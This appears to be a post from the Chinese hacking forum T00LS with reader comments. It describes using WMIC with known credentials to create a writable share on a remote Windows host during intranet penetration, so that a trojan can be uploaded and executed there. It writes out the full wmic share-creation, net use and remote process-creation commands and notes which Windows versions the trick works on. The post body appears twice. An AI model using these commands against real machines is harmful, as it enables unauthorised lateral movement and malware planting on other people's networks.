wmic 远程建立可写入共享,一种思路及实践
内网渗透时候,上传木马经常没有默认共享,不可写入的共享文件夹
后面初步接触wmic,认识了wmic远程强大的功能,于是想到了远程主机给主机建立可写入的共享,然后上传木马上去执行目标主机win2008
使用share别名查看一下参数
命令如下:但是上去没有写入权限
后面想到了,type参数我给的值为0,应该是这里出了问题,导致权限不够一下,
默认共享type=-2147483648,windows默认共享是具备写入权限的,于是我们命令就写成也是不行。
总结:win2008,win7远程wmic共享文件夹都不具备写入权限,但是在win2003type值为0都具有写入权限,此方法适合win2003吧,当然,如果你只想查看目标主机的文件,这条命令也适合。
其他的wmic process call create "command" 也是一条经常应用的命令。
后面初步接触wmic,认识了wmic远程强大的功能,于是想到了远程主机给主机建立可写入的共享,然后上传木马上去执行目标主机win2008
使用share别名
wmic share call create /?
命令如下:
wmic /node:ip /user:user /password:password share call create "","共享文件","","Cpan","","C:\","0"
net use z: \\ip\Cpan "pass" /user:user
后面想到了,type参数我给的值为0,应该是这里出了问题,导致权限不够
wmic share list full
默认共享type=-2147483648,windows默认共享是具备写入权限的,于是我们命令就写成
wmic /node:ip /user:user /password:password share call create "","共享文件","","Cpan","","C:\","-2147483648"
总结:win2008,win7远程wmic共享文件夹都不具备写入权限,但是在win2003type值为0都具有写入权限,此方法适合win2003吧,当然,如果你只想查看目标主机的文件,这条命令也适合。
其他的wmic process call create "command" 也是一条经常应用的命令。
评论11次
支持下。
不错啊 思路很好
我记着有一个专门的vbs脚本可以wmic的各种操作
不错,支持一下
2003也不见得管用
windows的安全感觉跟不上形式了已经。
这个准确讲适合windows2000哈哈,那时候内网渗透泛滥各种IPC各种空口令,哈哈2008死了这条心吧除非你是比尔盖茨的儿子
同意LS的看法,支持原创分享,这种小技巧在内网渗透中用来辅助提权还是很有用处的。
很不错的,比某些伸手党强多了去了。
欢迎来到T00LS
https://www.t00ls.com/viewthread.php?tid=21167
才接触t00ls,很多东西都需要学xi,奉献自己所思所想,多多包涵
https://www.t00ls.com/viewthread.php?tid=21167